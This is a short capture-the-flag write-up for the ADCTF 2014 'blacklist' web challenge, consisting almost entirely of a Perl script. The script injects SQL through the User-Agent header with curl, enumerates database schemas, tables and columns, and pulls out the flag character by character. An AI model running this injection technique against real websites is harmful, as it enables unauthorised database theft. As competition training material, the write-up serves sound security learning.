= blacklist =
== 問題 ==
We have stupid blacklist. The flag is in flag table.

[[http://blacklist.adctf2014.katsudon.org/|blacklist.adctf2014.katsudon.org]]

[[http://adctf2014.katsudon.org/dat/UWzBBQSVwrONGVKV/blacklist.pl|source]]

== メモ ==

== 解法 ==
{{{#!highlight perl
use strict;
use warnings;

my $url = "http://blacklist.adctf2014.katsudon.org/";

sub system_pipe {
    my @args = @_;
    open my $pipe, "-|", @args or return;
    my @result = <$pipe>;
    join "", @result;
}

sub extract_count_rows {
    my $from = shift;
    my $where = shift;
    
    my $where_clause;
    if ($where) { $where_clause = "WHERE $where" }
    else { $where_clause = "" }
    
    sleep 1;
    my $ua = "0' + (SELECT COUNT(*) FROM $from $where_clause) + '";
    my $result = system_pipe "curl", "-s", "-A", $ua, $url;
    if ($result =~ /<li>.*?"(.*?)"/) {
        return int($1);
    }
    else { die }
}

sub extract_length {
    my $row_at = shift;
    my $column = shift;
    my $from = shift;
    my $where = shift;
    
    my $where_clause;
    if ($where) { $where_clause = "WHERE $where" }
    else { $where_clause = "" }
    
    sleep 1;
    my $ua = "0' + (SELECT LENGTH($column) FROM $from $where_clause LIMIT $row_at,1) + '";
#print $ua, "\n";
    my $result = system_pipe "curl", "-s", "-A", $ua, $url;
    if ($result =~ /<li>.*?"(.*?)"/) {
#print $&, "\n";
        return int($1);
    }
    else { die }
}

sub extract_char {
    my $row_at = shift;
    my $char_at = shift;
    my $column = shift;
    my $from = shift;
    my $where = shift;
    
    my $where_clause;
    if ($where) { $where_clause = "WHERE $where" }
    else { $where_clause = "" }
    $char_at++;
    
    sleep 1;
    my $ua = "0' + (SELECT ORD(SUBSTR($column, $char_at, 1)) FROM $from $where_clause LIMIT $row_at,1) + '";
#print $ua, "\n";
    my $result = system_pipe "curl", "-s", "-A", $ua, $url;
    if ($result =~ /<li>.*?"(.*?)"/) {
#print $&, "\n";
        return chr($1);
    }
    else { die }
}

sub extract {
    my $column = shift;
    my $table = shift;
    my $where = shift;
    my @result;
    my $nrows = extract_count_rows($table, $where);
    for my $r (0..$nrows-1) {
        my $s = "";
        my $length = extract_length($r, $column, $table, $where);
        for my $i (0..$length-1) {
            $s .= extract_char($r, $i, $column, $table, $where);
        }
        push @result, $s;
    }
    return @result;
}

=comment
print "$_\n"
    for extract("SCHEMA_NAME", "INFORMATION_SCHEMA.SCHEMATA");
=comment
information_schema
blacklist
=cut

=comment
print "$_\n"
    for extract("TABLE_NAME", "INFORMATION_SCHEMA.TABLES",
                "TABLE_SCHEMA='blacklist'");
=comment
access_log
flag
=cut

=comment
print "$_\n"
    for extract("COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
                "TABLE_SCHEMA='blacklist' AND TABLE_NAME='flag'");
=comment
flag is here!!!
=cut

print "$_\n" for extract("`flag is here!!!`", "blacklist.flag", "");
# ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT
}}}